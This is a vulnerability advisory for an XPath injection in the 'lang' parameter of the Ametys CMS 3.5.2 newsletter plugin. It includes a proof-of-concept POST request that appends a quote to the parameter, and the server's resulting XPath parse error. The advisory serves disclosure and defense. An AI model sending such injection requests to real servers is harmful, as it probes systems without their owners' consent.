Ametys CMS 3.5.2 - (lang parameter) XPath Injection Vulnerability

Ametys CMS 3.5.2 (lang parameter) XPath Injection Vulnerability Vendor: Anyware ServicesProduct web page: http://www.ametys.orgDownload: http://www.ametys.org/en/download/ametys-cms.htmlAffected version: 3.5.2 and 3.5.1 Summary: Ametys is a Java-based open source CMS combiningrich content with an easy-to-use and intuitive interface. Desc: Input passed via the 'lang' POST parameter in thenewsletter plugin is not properly sanitised before beingused to construct a XPath query for XML data. This can beexploited to manipulate XPath queries by injecting arbitraryXPath code. Tested on: Microsoft Windows 7 Ultimate (EN) 32bit           Jetty 6.1.21  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscience  Advisory ID: ZSL-2013-5162Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php  24.11.2013 --   Request:-------- POST /cms/plugins/newsletter/category/nodes HTTP/1.1Host: 192.168.8.11:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://192.168.8.11:8080/cms/event/index.htmlContent-Length: 137Cookie: ametys.accept.non.supported.navigators=on; JSESSIONID=1na81i031qhdw; __utma=111872281.3880910164568079000.1385252858.1385252858.1385252858.1; __utmb=111872281.1.10.1385252858; __utmc=111872281; __utmz=111872281.1385252858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)Connection: keep-alivePragma: no-cacheCache-Control: no-cache sitename=event&categoriesOnly=&debug=%255Bobject%2520Object%255D&userLocale=en&siteName=event&skin=demo&categoryID=root&lang=en'&node=root  Response:--------- HTTP/1.1 500 Internal Server ErrorDate: Sun, 24 Nov 2013 00:55:08 GMTContent-Type: text/html; charset=utf-8Server: Jetty(6.1.21)Content-Length: 27280 ......org.apache.jackrabbit.spi.commons.query.xpath.ParseException:                     Encountered "/'//element(*, ametys:page)[@ametys-internal:tags =/'" at line 1, column 68.                    Was expecting one of:                    "or" ...                    "and" ...                    "div" ...                    "idiv" ...                    "mod" ...                    "*" ...                    "return" ...                    "to" ...                    "where" ...                    "intersect" ...                    "union" ...                    "except" ...                    <Instanceof> ...                    <Castable> ...                    "/" ...                    "//" ...                    "=" ...                    "is" .........